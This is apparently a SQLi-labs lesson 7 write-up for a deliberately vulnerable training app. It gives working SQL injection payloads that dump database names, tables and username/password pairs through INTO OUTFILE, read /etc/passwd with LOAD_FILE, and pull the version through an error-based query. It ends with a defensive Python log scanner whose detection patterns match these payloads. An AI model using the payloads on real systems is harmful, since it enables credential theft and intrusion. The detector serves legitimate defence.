SQLi-labs: Lesson 7

  1. Get the database name:

    ?id=1')) UNION SELECT(select database()),2,3 into outfile "/var/www/html/sqli/Less-7/1.txt";--+

    Content of 1.txt:

    So, the database used is 'security'.

  2. Get all table names of 'security':

    ?id=1')) UNION SELECT (select group_concat(table_name) from information_schema.tables where table_schema='security'),2,3 into outfile "/var/www/html/sqli/Less-7/2.txt";--+

    Content of 2.txt:

    So, there are four tables in 'security': emails, referers, uagents, users.

  3. Get all columns of table 'users':

    ?id=1')) UNION SELECT (select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),2,3 into outfile "/var/www/html/sqli/Less-7/3.txt";--+

    Content of 3.txt:

    So, three columns: id, username, password.

  4. Get all username and password pairs:

    ?id=1')) UNION SELECT id, username, password from users into outfile "/var/www/html/sqli/Less-7/4.txt";--+

    Content of 4.txt:

    Comments:

    load_file("/etc/passwd") can also be used the same way to dump the passwd file:

    ?id=1')) union select load_file("/etc/passwd"),2,3 into outfile "/var/www/html/sqli/Less-7/5.txt";--+

To get the database version, use the following query:

?id=1')) AND (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
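As an added, defender-side example that is not part of the original writeup: a small Python scanner that flags the query shapes used in this lesson (the closing `'))`, UNION SELECT, INTO OUTFILE, LOAD_FILE, information_schema enumeration and the floor(rand(0)*2) error trick) when they appear in web server access logs. The log lines are constructed samples in Apache combined format; only the /sqli/Less-7/ path and the query shapes come from the page, the addresses, timestamps and indicator names are assumptions.

```python
"""Flag Less-7 style payloads (from this page) in web server access logs.

Added example, not part of the original writeup. The log lines are
constructed samples in Apache combined format; only the /sqli/Less-7/ path
and the query shapes come from the page, addresses and times are made up.
"""
import re
from urllib.parse import unquote_plus

# Indicators drawn from the queries on this page (names are our own choice).
PATTERNS = {
    "quote_paren_break": re.compile(r"'\)\)"),                        # 1'))
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "into_outfile": re.compile(r"\binto\s+(out|dump)file\b", re.I),  # file write
    "load_file": re.compile(r"\bload_file\s*\(", re.I),              # file read
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "error_based_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
}
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" (?P<status>\d{3})')

def classify(line):
    """Return (ip, decoded path, [indicator names]) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice so single- and double-encoded payloads normalise to the same text.
    path = unquote_plus(unquote_plus(m.group("path")))
    return m.group("ip"), path, [n for n, rx in PATTERNS.items() if rx.search(path)]

def scan(lines):
    """Yield classify() results for lines that trip at least one indicator."""
    for line in lines:
        res = classify(line)
        if res and res[2]:
            yield res

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '10.0.0.7 - - [10/Oct/2023:13:55:30 +0000] "GET /sqli/Less-7/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /sqli/Less-7/?id=1%27%29%29+UNION+SELECT+%28select+database%28%29%29%2C2%2C3+into+outfile+%22/var/www/html/sqli/Less-7/1.txt%22%3B--+ HTTP/1.1" 200 512 "-" "curl/7.88"',
    '10.0.0.5 - - [10/Oct/2023:13:56:01 +0000] "GET /sqli/Less-7/?id=1%27%29%29+union+select+load_file%28%22/etc/passwd%22%29%2C2%2C3--+ HTTP/1.1" 200 512 "-" "curl/7.88"',
    '10.0.0.5 - - [10/Oct/2023:13:56:40 +0000] "GET /sqli/Less-7/?id=1%27%29%29+AND+%28select+1+from+%28select+count%28%2A%29%2Cconcat%28version%28%29%2Cfloor%28rand%280%29%2A2%29%29x+from+information_schema.tables+group+by+x%29a%29--+ HTTP/1.1" 200 512 "-" "curl/7.88"',
]

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(f"{ip} {', '.join(hits)}: {path}")
```

An INTO OUTFILE or LOAD_FILE hit is worth treating as a file-system access attempt, not just a query error, since it only works when the MySQL account holds the FILE privilege and the web root is writable by it.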
